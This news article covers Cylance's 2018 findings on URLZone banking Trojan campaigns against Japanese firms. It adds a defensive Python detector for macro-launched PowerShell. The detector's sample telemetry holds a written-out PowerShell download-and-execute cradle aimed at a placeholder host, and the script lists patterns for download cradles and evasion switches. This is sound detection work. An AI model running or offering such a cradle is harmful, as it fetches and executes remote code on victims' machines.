URLZone, a sophisticated banking Trojan that has been around for nearly a decade, has re-emerged in several campaigns targeting Japanese companies, security researchers found. Cylance researchers said the malware, first detected in 2009, has resurfaced in new campaigns targeting Japan between February and April 2018.
The malware leverages phishing emails and infected attachments to compromise systems using macros embedded in MS Office documents to download and execute URLZone via a PowerShell script.
Once executed, the URLZone malware runs several checks to gather system information and to determine whether it is running in a sandbox. If it detects that it is operating within an analysis environment, it immediately exits.
It also comes with various malicious capabilities, including process hollowing and the ability to download additional malicious software from C2 servers.
Using the process-hollowing technique, URLZone injects malicious code into legitimate processes. It has also been observed downloading and executing the Cutwail and Ursnif Trojans in an April campaign.
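The delivery chain described above (Office macro spawning PowerShell, which downloads and runs the payload) leaves a characteristic parent/child process trail that endpoint telemetry can flag. The following is an added detection example written for this article, not code from Cylance or from the campaign itself; it runs over constructed process-creation events (Sysmon-style fields, with a placeholder `example.invalid` host) and the indicator list is an illustrative choice, not a published signature.

```python
import re

# Parent processes that should rarely spawn a script interpreter on a workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script hosts commonly launched by macro droppers.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line fragments typical of a PowerShell download cradle or of
# evasion switches. Illustrative list assumed for this example, not a
# complete or vendor-published signature.
CRADLE_PATTERNS = [
    (r"downloadstring|downloadfile|net\.webclient", "download cradle"),
    (r"invoke-webrequest|\biwr\b|start-bitstransfer", "web request"),
    (r"invoke-expression|\biex\b", "dynamic execution"),
    (r"-e(nc|ncodedcommand)?\s", "encoded command"),
    (r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|bypass", "evasion switches"),
]


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(event: dict) -> dict:
    """Score one process-creation event and explain why it was flagged."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    cmd = event.get("command_line", "")
    reasons = []
    office_spawn = parent in OFFICE_PARENTS and child in SCRIPT_HOSTS
    if office_spawn:
        reasons.append(f"office process {parent} spawned {child}")
    for pattern, label in CRADLE_PATTERNS:
        if re.search(pattern, cmd, re.IGNORECASE):
            reasons.append(label)
    # Office -> script host plus at least one cradle/evasion indicator is
    # the macro-dropper shape; either signal alone is worth a look.
    if office_spawn and len(reasons) > 1:
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons}


def triage(events: list) -> list:
    """Return (image, verdict) pairs for every event that scored above 'none'."""
    results = []
    for event in events:
        verdict = analyze_event(event)
        if verdict["severity"] != "none":
            results.append((basename(event["image"]), verdict))
    return results


# Constructed sample telemetry: one macro-dropper style event, one benign
# admin shell, and one Office-spawned cmd.exe with no cradle indicators.
SAMPLE_EVENTS = [
    {
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                        '.DownloadString(\'http://example.invalid/stage\')"',
    },
    {
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -Command Get-Process",
    },
    {
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd.exe /c dir",
    },
]

if __name__ == "__main__":
    for image, verdict in triage(SAMPLE_EVENTS):
        print(image, verdict["severity"], "; ".join(verdict["reasons"]))
```

The high-severity verdict depends on two independent signals (an Office parent and a cradle-like command line), which keeps a lone `-NoProfile` in an administrator's shell from paging anyone while still surfacing Office-spawned interpreters at medium severity for review.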
"URLZone remains a persistent threat to infrastructure almost a decade after its first appearance. Its long track record of success makes it a favored malicious code among threat actors," Cylance researchers wrote in a blog post. In the April campaign, URLZone downloaded Cutwail (Pony or Pushdo) and Ursnif (Gozi). "Although we do not know all of the background of this campaign, these three threats are obviously related, and the Cutwail bot might be an infrastructure that plays a major role in delivering URLZone."